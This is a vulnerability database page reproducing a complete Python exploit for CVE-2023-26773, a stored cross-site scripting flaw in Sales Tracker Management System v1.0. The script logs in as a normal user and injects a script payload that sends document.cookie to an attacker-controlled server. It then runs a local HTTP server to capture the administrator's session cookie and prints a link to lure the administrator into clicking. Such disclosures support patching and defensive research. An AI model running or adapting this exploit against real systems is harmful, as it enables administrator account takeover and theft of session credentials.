Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Sales Tracker Management System 1.0 Cross Site Scripting

Related Vulnerabilities: CVE-2023-26773  
Publish Date: 05 Apr 2023
Author: Achuth V P
Source 
                							

                # Exploit Title: Sales Tracker Management System v1.0 - One click account takeover XSS
# Exploit Author: Achuth V P (retrymp3)
# Date: February 08, 2023
# CVE: CVE-2023-26773
# Vendor Homepage: https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=16061&title=Sales+Tracker+Management+System+using+PHP+Free+Source+Code
# Tested on: Ubuntu, Apache, Mysql
# Vendor: oretnom23
# Version: v1.0
# Exploit Description: Sales Tracker Management System v1.0 suffers from XSS which results in one click account take over by stealing cookies.

import requests
from requests.auth import HTTPBasicAuth
import http.server
import socketserver
import argparse
from colorama import (Fore as F, Back as B, Style as S)
BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT


def expServer():
    Handler = http.server.SimpleHTTPRequestHandler
    PORT = 8000 #You can change.
    with socketserver.TCPServer(("", PORT), Handler) as httpd:
        print("serving at port", PORT)
        httpd.serve_forever()

def auth():
    print("Enter the username and password for a normal user")
    user=input("Username: ")
    passwd=input("Password: ")
    auth = HTTPBasicAuth(user, passwd)
    params = {'username': user, 'password': passwd}
    #proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
    #proxies=proxies give it as an argument to requests.get() to proxy it through burp.
    req=requests.post(url+'classes/Login.php?f=login',data=params)

def payL():
    tf=requests.post(url+'/classes/Master.php?f=save_product',
        files=(
            ('id', (None, '1')),
            ('code', (None, '123456')),
            ('name', (None, 'xssssssREssss')),
            ('description', (None, '<script>document.location="http://0.0.0.0:8000/?cookie="+document.cookie</script>')),
            ('price', (None, '355.19')),
            ('status', (None, '1'))
        )
    )
    if (tf):
        print("Send this to admin: "+FR+url+"admin/products/view_product.php?id=1"+FR+"\n")
        print(FC+"When admin clicks on the link you can see admin's cookie in the request log of the python server"+FY+"\n")
    else:
        print("Bad request. Check the url")

def bullet(char,color):
    C=FB if color == 'B' else FR if color == 'R' else FG
    return SB+C+'['+ST+SB+char+SB+C+']'+ST+' '


def sig():
    SIG  = SB+FY+"         "+FR+".-----..___.._____.      "+FY+"\n"
    SIG += FY+"         |  ..   >||__-__-_|         \n"
    SIG += FY+"         "+FR+"|  |.'  ,||_______          "+FY+"\n"
    SIG += FY+"         |    _ < ||__-__-_|"+FR+"*  *  *"+FY+" \n"
    SIG += FY+"         |  |\  \ ||__-__-_\n"
    SIG += FY+"         "+FR+"|___ \_ \||_______| "+FY+"\n"
    SIG += FY+"\n"+"    _____"+FR+"github.com/retrymp3"+FY+"_____\n"+ST
    return SIG

def argsetup():
    about  = SB+FT+'Admin account takeover - Sales Tracking Manager v1.0\n'+ST
    return about


if __name__ == "__main__":
    header = SB+FT+"\n"+'             '+FR+'retrymp3\n'+ST
    print(header)
    print(sig())
    print(argsetup())
    url=input("Enter the base url: ")
    auth()
    payL()
    expServer()
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started